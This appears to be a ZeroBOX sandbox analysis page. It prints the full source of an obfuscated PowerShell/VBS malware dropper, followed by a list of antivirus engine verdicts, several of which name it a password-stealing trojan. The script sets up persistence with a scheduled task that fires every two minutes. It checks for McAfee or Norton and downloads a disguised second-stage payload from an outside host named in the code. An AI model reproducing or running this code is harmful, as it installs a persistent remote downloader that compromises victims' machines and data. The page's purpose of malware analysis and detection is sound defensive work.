Static | ZeroBOX
No static analysis available.
Function sAppName
start-sleep -s 2
[system.io.directory]::CreateDirectory("C:\ProgramData\Document\")
#-----------------------------------------------------------------------------
$Content = @'
set T1 = CreateObject("WScript.Shell")
T1.run "powershell -ExecutionPolicy Bypass & C"+":"+"\"+"P"+"r"+"o"+"g"+"r"+"a"+"m"+"D"+"a"+"t"+"a"+"\"+"D"+"o"+"c"+"u"+"m"+"e"+"n"+"t"+"\"+"M"+"a"+"n"+"a"+"g"+"i"+"n"+"g"+"."+"p"+"s"+"1",0
[IO.File]::WriteAllText("C:\ProgramData\Document\sChildKey.vbs", $Content)
#-----------------------------------------------------------------------------
start-sleep -s 3
$action = New-ScheduledTaskAction -Execute 'C:\ProgramData\Document\sChildKey.vbs'
$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 2)
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "VersionNumber"
start-sleep -s 6
$NEWS = 'C/:/\P/r/o/g/ra/m/D/at/a\D/oc/um/ent\'.Replace("/","")
$mcAfee = 'C:/\Pro/gram Fil/es\Common /Files\McAfee\/Platf/orm\McUIC/nt.e/xe'.Replace("/","")
$nort = 'C:/\Pr/og/ra/m Fil/es\No/r/to/n S/ecu/rit/y\i/so/l/at/e./i/n/i'.Replace("/","")
if([System.IO.File]::Exists($mcAfee)){
if((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e"('https://www.kbproducciones.com/.TEAK/.M1.jpg', $NEWS + 'Managing.ps1')){
start-sleep -s 7
Start "C:\ProgramData\Document\sChildKey.vbs"
elseif([System.IO.File]::Exists($nort)){
if((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e"('https://www.kbproducciones.com/.TEAK/.N1.jpg', $NEWS + 'Managing.ps1')){
start-sleep -s 7
Start "C:\ProgramData\Document\sChildKey.vbs"
if((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e"('https://www.kbproducciones.com/.TEAK/.M1.jpg', $NEWS + 'Managing.ps1')){
start-sleep -s 7
Start "C:\ProgramData\Document\sChildKey.vbs"
IEX sAppName
Antivirus Signature
Bkav Clean
Lionic Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
McAfee Clean
Malwarebytes Clean
VIPRE Trojan.PWS.Agent.SVN
Sangfor Trojan.Generic-PS.Save.721ff762
K7AntiVirus Clean
K7GW Clean
BitDefenderTheta Clean
VirIT Clean
Cyren Clean
Symantec Clean
ESET-NOD32 PowerShell/Agent.YT
TrendMicro-HouseCall Clean
Avast Clean
Cynet Malicious (score: 99)
Kaspersky Clean
BitDefender Trojan.PWS.Agent.SVN
NANO-Antivirus Clean
SUPERAntiSpyware Clean
MicroWorld-eScan Trojan.PWS.Agent.SVN
Rising Clean
Sophos Clean
Baidu Clean
F-Secure Trojan.TR/PShell.Dldr.G2
DrWeb VBS.DownLoader.2305
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition Clean
FireEye Trojan.PWS.Agent.SVN
Emsisoft Trojan.PWS.Agent.SVN (B)
GData Trojan.PWS.Agent.SVN
Jiangmin Clean
Avira TR/PShell.Dldr.G2
MAX malware (ai score=80)
Antiy-AVL Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Trojan.PWS.Agent.SVN
ViRobot Clean
ZoneAlarm Clean
Microsoft Clean
Google Clean
AhnLab-V3 Clean
Acronis Clean
VBA32 Clean
ALYac Trojan.PWS.Agent.SVN
TACHYON Clean
Zoner Clean
Tencent Clean
Yandex Clean
Ikarus Trojan.PowerShell.Agent
MaxSecure Clean
Fortinet Clean
AVG Clean
Panda Clean
No IRMA results available.